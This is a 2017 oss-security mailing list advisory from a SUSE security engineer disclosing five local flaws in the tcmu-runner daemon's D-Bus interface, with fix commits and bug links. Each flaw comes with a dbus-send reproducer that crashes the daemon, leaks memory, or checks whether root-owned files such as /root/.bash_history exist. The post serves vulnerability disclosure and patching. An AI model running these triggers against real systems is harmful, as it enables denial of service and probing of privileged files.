Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20170724101204.GA22772@f195.suse.de>
Date: Mon, 24 Jul 2017 12:12:04 +0200
From: Matthias Gerstner <mgerstner@...e.de>
To: oss-security@...ts.openwall.com
Subject: tcmu-runner: multiple vulnerabilities in tcmu-runner daemon allowing
 local DoS, information leak and a memory leak

A security audit of tcmu-runner's D-Bus service implementation showed a
number of security issues.

I've requested CVEs for these issues, request is still pending. I will
update once I've got them.

It seems upstream will remove the D-Bus interface completely from the
tcmu-runner daemon in the future.

Package: https://github.com/open-iscsi/tcmu-runner

------------------------------------------------------------------------
glfs handler allows local DoS via crafted CheckConfig strings
------------------------------------------------------------------------

Description:

A local non-root user with access to the D-Bus system bus can call the
CheckConfig method implemented in the tcmu-runner daemon via
handler_glfs.so and cause various kinds of segmentation faults,
depending on the string passed to the method.

For example the "hosts" variable in glfs_check_config() is not zero
initialized, but always freed on error, causing invalid free and/or
invalid memory accesses.

References:

- The check_config callback implementation was recently removed upstream
  in this commit:

  https://github.com/open-iscsi/tcmu-runner/commit/61bd03e600d2abf309173e9186f4d465bb1b7157

- SUSE bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=1049485

Reproducer:

# start the tcmu-runner service as root
systemctl restart tcmu-runner.service
# run this dbus command as a regular user
dbus-send --system --print-reply --dest=org.kernel.TCMUService1 /org/kernel/TCMUService1/glfs org.kernel.TCMUService1.CheckConfig string:something
# -> tcmu-runner daemon will have crashed with segmentation fault

------------------------------------------------------------------------
UnregisterHandler dbus method in tcmu-runner daemon for non-existing
handler causes DoS
------------------------------------------------------------------------

Description:

A local non-root user with access to the D-Bus system bus can call the
UnregisterHandler method implemented in the tcmu-runner daemon with the
name of an unknown tcmu runner handler as parameter and cause a NULL
pointer dereference.

References:

- upstream fix: https://github.com/open-iscsi/tcmu-runner/commit/e2d953050766ac538615a811c64b34358614edce
- SUSE bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=1049488

Reproducer:

# start the tcmu-runner service as root
systemctl restart tcmu-runner.service
# run this dbus command as a regular user
dbus-send --system --print-reply --dest=org.kernel.TCMUService1 /org/kernel/TCMUService1/HandlerManager1 org.kernel.TCMUService1.HandlerManager1.UnregisterHandler string:fake_handler
# -> tcmu-runner daemon will have crashed with segmentation fault



------------------------------------------------------------------------
UnregisterHandler D-Bus method in tcmu-runner daemon for internal
handler causes DoS
------------------------------------------------------------------------

Description:

A local non-root user with access to the D-Bus system bus can call the
UnregisterHandler method implemented in the tcmu-runner daemon with the
name of a handler loaded internally in tcmu-runner via dlopen() and
cause a NULL pointer dereference resulting in DoS.

References:

- upstream fix: https://github.com/open-iscsi/tcmu-runner/commit/bb80e9c7a798f035768260ebdadffb6eb0786178
- SUSE bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=1049489

Reproducer:

# start the tcmu-runner service as root
systemctl restart tcmu-runner.service
# run this dbus command as a regular user, it will attempt to unregister the
# locally loaded qcow handler
dbus-send --system --print-reply --dest=org.kernel.TCMUService1 /org/kernel/TCMUService1/HandlerManager1 org.kernel.TCMUService1.HandlerManager1.UnregisterHandler string:qcow
# -> tcmu-runner daemon will have crashed with segmentation fault


------------------------------------------------------------------------
Memory leaks can be triggered in tcmu-runner daemon by calling D-Bus
method for (Un)RegisterHandler
------------------------------------------------------------------------

Description:

A local non-root user with access to the D-Bus system bus can call the
RegisterHandler or UnregisterHandler methods implemented in the
tcmu-runner daemon to trigger memory leaks. Done so repeatedly would
cause a root daemon to hog memory, possibly resulting in DoS for the
daemon itself or other system components that fail to acquire memory as
a result.

References:

- upstream fix: https://github.com/open-iscsi/tcmu-runner/commit/7a78eda52d973d3edc06fea84ad874678d6055f0
- SUSE bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=1049490

Reproducer:

# *stop* the tcmu-runner service as root
systemctl restart tcmu-runner.service
# run the tcmu-runner service as root in valgrind
valgrind --max-stackframe=2097208 --leak-check=full /usr/bin/tcmu-runner
# run this dbus command multiple times as a regular user (this will trigger
# the leak in RegisterHandler)
dbus-send --system --print-reply --dest=org.kernel.TCMUService1 /org/kernel/TCMUService1/HandlerManager1 org.kernel.TCMUService1.HandlerManager1.RegisterHandler string:0memory string:stuff
# ctrl-c the valgrind process and you'll see an amount of "definitely lost"
# bytes. when doing the same without the dbus-send calls this sould be zero
# "definitely lost" bytes



------------------------------------------------------------------------
qcow handler opens up an information leak via the CheckConfig D-Bus
method
------------------------------------------------------------------------

Description:

A local non-root user with access to the D-Bus system bus can call the
CheckConfig method implemented in the tcmu-runner daemon via
handler_qcow.so and exploit an information leak by passing in arbitrary
filenames to check.

This allows a local user to check for the existence of root owned files,
which might enable more serious security issues in combination with
other security flaws in a system.

References:

- upstream fix:

  This one is difficult to fix, upstream asked me to remove all
  check_config callbacks instead:

  https://github.com/open-iscsi/tcmu-runner/commit/8cf8208775022301adaa59c240bb7f93742d1329

- SUSE bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=1049491

Reproducer:

# start the tcmu-runner service as root
systemctl restart tcmu-runner.service
# run this dbus command as a regular user
dbus-send --system --print-reply --dest=org.kernel.TCMUService1 /org/kernel/TCMUService1/qcow org.kernel.TCMUService1.CheckConfig string://root/.bash_history
# this will return True if /root/.bash_history exists, False otherwise

Regards

Matthias

-- 
Matthias Gerstner <matthias.gerstner@...e.de>
Dipl.-Wirtsch.-Inf. (FH), Security Engineer
https://www.suse.com/security
Telefon: +49 911 740 53 290

SUSE Linux GmbH 
GF: Felix Imendörffer, Jane Smithard, Graham Norton
HRB 21284 (AG Nuernberg)

Download attachment "signature.asc" of type "application/pgp-signature" (820 bytes)

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.